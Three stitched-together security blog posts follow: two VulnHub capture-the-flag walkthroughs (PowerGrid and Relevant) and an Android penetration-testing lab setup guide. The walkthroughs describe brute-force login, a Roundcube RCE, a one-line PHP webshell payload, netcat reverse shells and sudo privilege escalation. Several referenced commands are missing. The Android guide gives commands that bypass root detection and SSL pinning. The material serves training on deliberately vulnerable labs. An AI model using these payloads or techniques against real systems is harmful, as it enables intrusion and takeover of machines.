PowerGrid: 1.0.1 Vulnhub Walkthrough

Today we are going to solve another boot2root challenge called "PowerGrid: 1.0.1".  It's available at VulnHub for penetration testing and you can download it from here.

The merit of making this lab is due to Thomas Williams. Let's start and learn how to break it down successfully.

Level: Hard

Penetration Testing Methodology

Reconnaissance

§  Netdiscover

§  Nmap

Enumeration

§  Dirsearch

Exploiting

• HTTP Basic Authentication Brute Force
• Execute remote code (RCE) Roundcube exploit
• Decrypt key PGP and abuse for SSH

Privilege Escalation

§  Abuse of sudo Rsync

§  Abuse of pivoting SSH

§  Capture the flag

Walkthrough

Reconnaissance

We are looking for the machine with netdiscover

$ netdiscover -i ethX

So, we put the IP address in our "/etc/hosts" file and start by running the map of all the ports with operating system detection, software versions, scripts and traceroute.

$ nmap -A –p- powergrid.vh

 

Enumeration

The game begins and the burden, since we will only have 3 hours to solve the challenge and thus save the critical infrastructure.

We access the web service, we see the time, but we also list three users: deez1, p48 and all2.

We use dirsearch and list a directory protected with HTTP Authentication Basic.

With what we found and knowing 3 users, we will make a brute force attack with the Hydra tool and the rockyou dictionary.

We managed to access with the credentials obtained and listed a webmail with Roundcube.

We use the same credentials and can read a single email, in it we have an encrypted message in PGP, but to be able to read its content in plain, we need the private key and the password. It is very likely that it is the same password, since this user has reused the same password for several services.

Exploiting

We listed the version of Roundcube and looked for exploits, we found that it has a version vulnerable to RCE (Remote Code Execution)

Exploit: https://www.exploit-db.com/exploits/40892

As always, we will review what the exploitation consists of and make a proof of concept, this proof will create a info.php file.

Legitimate request:

Malicious request:

We run the file and see that the site is indeed vulnerable.

Now we will create a php file that allows us to execute arbitrary commands.

Payload URL-encode: <?php passthru($_GET['cmd']); ?>

We check that our file works:

Perfect! Now we'll put a netcat on the wire and run a reverse shell. (remember to encode it in URL-encode all characters)

Great! Now we will use our two favorite commands to get an interactive shell.

We will go through files and directories recursively, we will stumble upon the first flag and the first hint.

So let's start, we identify ourselves with the user "p48" reusing the same credentials and we find in his folder "/home/" the gpg private key (remember that it was the only one we were missing to be able to decipher the text).

For a strange reason, the native "gpg" tool didn't work for me, so I had to use this online tool and we get a SSH private key.

The machine we have committed to had no SSH service open, we remembered the "pivot" track, checked the connections and found a service that works by "docker".

We give 600 permissions to the private key and use it to connect via SSH to the docker docker and read the 2nd flag and the next hint.

The next hint leads me to run "sudo -l" and check that you can run the rsync binary as root.  We execute the following command to escalate privileges as root abusing this advantage.

And once being root, we access its folder and read the 3rd flag and the next hint.

Privilege Escalation (root)

"backwards? pivoting?" Let's repeat the SSH move, but this time we will do it from the compromised docker machine.

Great! We have permissions as root and we can read the last flag.

Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. Contacted on LinkedIn and Twitter.

Android Penetration Testing: Lab Setup

Does setting a Password or biometric security really protect your phone? Or are these things just only protect your mobile data from the attackers. From this article, we'll learn how to set up a security environment for a Mobile Application that includes android penetration testing tools & genymotion.

Table of Content

Install Genymotion

·         Install Virtual Android Device

·         Installation of Gapps

Connect to Android shell using Ubuntu

Android Penetration testing using Frida

·         Install Frida in Ubuntu

·         Install Objection in Ubuntu

Install Frida-Server in Android

 

Install Genymotion

Let’s first download “genymotion” form here, according to our system type (window or Linux). Also, thus then create an account on genymotion as in order to use it we need to login inside the application.

Thereby, run the installer & login with your genymotion credentials, if it asks for the licence key click on personal use.

 

Here since we are using community edition, therefore, I chose the second option.

Install Virtual Android Device

Once, it get installed up, let’s now install an android simulator using Genymotion for any type of device, but Android API should be above than API23.

 

Further, let’s opt NAT as the Network Mode while installing the android phone.

As you can see, I have installed the Google Nexus 5X with API26.

Now turn on your virtual box and here also change the network adapter to NAT for your android mobile.

Now switch ON your phone through Genymotion and thereby we’ll get an IP at the top of the Phone’s screen.

Installation of Gapps

Gapps also is known as Google applications, an application similar to - Google Play

Yes, we can use Google Play to download any play-store program, or we can drag and drop any APK file on this Genymotion device that will automatically install up the application

To install Gapps, all you need to click the “Open GAPPS” button, and this will start installing it at the background.

After the restart, you can see the Google Play application inside the Genymotion’s device.

Connect to Android shell using Ubuntu

To perform penetration testing we are supposed to access an android shell, here we are using ubuntu to connect it, so let’s install some tools.

apt install android-tools-adb

Execute the following command to connect with the phone

adb connect 192.168.41.101

adb shell

Once you will get the Android shell, you will find it similar as a Linux one.

 

Android Penetration Testing using Frida

Install Frida in Ubuntu

Frida is a powerful open-source tool that allows a software professional to intercept the data and thus injects the malicious payloads.
To install Frida, ensure you have the root privilege of the Ubuntu machine and thus then execute the following command –

pip3 install Frida-tools

Install Objection in Ubuntu

“Objection” is a runtime mobile exploration toolkit, powered by Frida, built to help us to assess the security postures of our mobile applications, without needing a rooting.

pip3 install objection

Install Frida-Server in Android

Before, you install the Frida-Server for your android device, identity its architecture with the help of the following command:

adb shell

getprop |grep abi

 

Visit the given URL https://github.com/frida/frida/releases and download the zip file for your device. Since we have x86architecture therefore I have downloaded the for x86.

 

Once we have downloaded & extracted the Frida server, we thus renamed the file as “Frida-server” and copied the folder inside the /tmp directory of the android device with the help of the following command.

adb push frida-server /tmp

 

Change the permission for the Frida-server inside the /tmp of the android device.

adb shell

cd /tmp

chmod 777 frida-server

 

With the help of the Frida, you can identify the process for the android application running at the background.

Here we are testing for DIVA which is a vulnerable apk used for android penetration testing tutorials. So, we have installed this apk in our android device and will test this apk using Frida.

 

Grep the process for DIVA and then use objection tool to explore it. It allows you to perform many tasks as listed below:

§  Interact with the filesystem, listing entries as well as upload & download files where permitted.

§  Perform various memory-related tasks, such as listing loaded modules and their respective exports.

§  Attempt to bypass and simulate jailbroken or rooted environments.

§  Discover loaded classes and list their respective methods.

§  Perform common SSL pinning bypasses.

§  Dynamically dump arguments from methods called as you use the target application.

§  Interact with SQLite databases inline without the need to download the targeted database and use an external tool.

§  Execute custom Frida scripts

frida -ps -U | grep diva

objection -g jakhar.aseem.diva explore

android root disable

android sslpinning disable

As you can see, we have bypass root-detection & SSL-Pining. SSL Pinning is an additional security layer to prevent Interception & MITM attack.

Reference: https://github.com/sensepost/objection/wiki/Features

Relevant: 1 Vulnhub Walkthrough

Today we are going to solve another boot2root challenge called "Relevant: 1".  It's available at VulnHub for penetration testing and you can download it from here.

The merit of making this lab is due to @iamv1nc3nt. Let's start and learn how to break it down successfully.

Level: Intermediate

Penetration Testing Methodology

Reconnaissance

§  Netdiscover

§  Nmap

Enumeration

§  Dirsearch

§  Nmap with scripts WordPress

Exploiting

• Wp-file-manager 6.7 Remote Code Execution (RCE)

Privilege Escalation

§  Abuse of credentials with weak hashes in hidden files

§  Abuse of sudo

§  Capture the flag

Walkthrough

Reconnaissance

We are looking for the machine with netdiscover

$ netdiscover -i ethX

So, we put the IP address in our "/etc/hosts" file and start by running the map of all the ports with operating system detection, software versions, scripts and traceroute.

$ nmap -A –p- 192.168.10.161

 

Enumeration

So far it seems all easy, a web service with some links containing credential information in leaks and a QR code to set up a double authentication factor (2FA) . Too beautiful to be true!

Listing of credentials in public leaks.

Content of the QR code:

We log in via SSH, insert the password, insert the double authentication factor and disconnect! The account has disabled the use of this service, so it is a rabbit hole.

It's time to launch my favorite fuzzing tool, in my case I used dirsearch. We list that there are WordPress files and directories displayed on the machine.

Going back to the clue given by the creator of the machine in the description: "enumerate the box, then enumerate the box differently".

Since our only evidence is the remains of WordPress files, we will try with the nmaps scripts for this CMS.

It will list two plugins, among them "wp-file-manager 6.7".

 

Exploiting

I After the above list, we look for exploits and vulnerabilities that we can exploit for this version. We found an exploit that allows remote code execution without the need for authentication.

Exploit: https://github.com/w4fz5uck5/wp-file-manager-0day

Execute the exploit and access the server.

Since visibility is a bit of a problem, we upload a "pentestmonkey" webshell, put a netcat on it and run our webshell.

We execute our two favorite commands to get an interactive shell.

We read the file "wp-config.php", but something tells me that the password is not going to help us much either. xD

We checked the files of the user "h4x0r" and found a "hidden" folder with three dots, in it there is a file called "note.txt" with some credentials in SHA-1 that we must crack.

We access the online site "hashes.com" and insert our hash and get the password in plain text.

Privilege Escalation (root)

Now yes, we authenticate with the user "news", we execute "sudo -l" and we see that we have permissions to execute the binary "node”.

We take advantage of this to scale privileges in the system as root, for this we will execute the following syntax.

And finally, we will read our deserved flag!

Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. Contacted on LinkedIn and Twitter.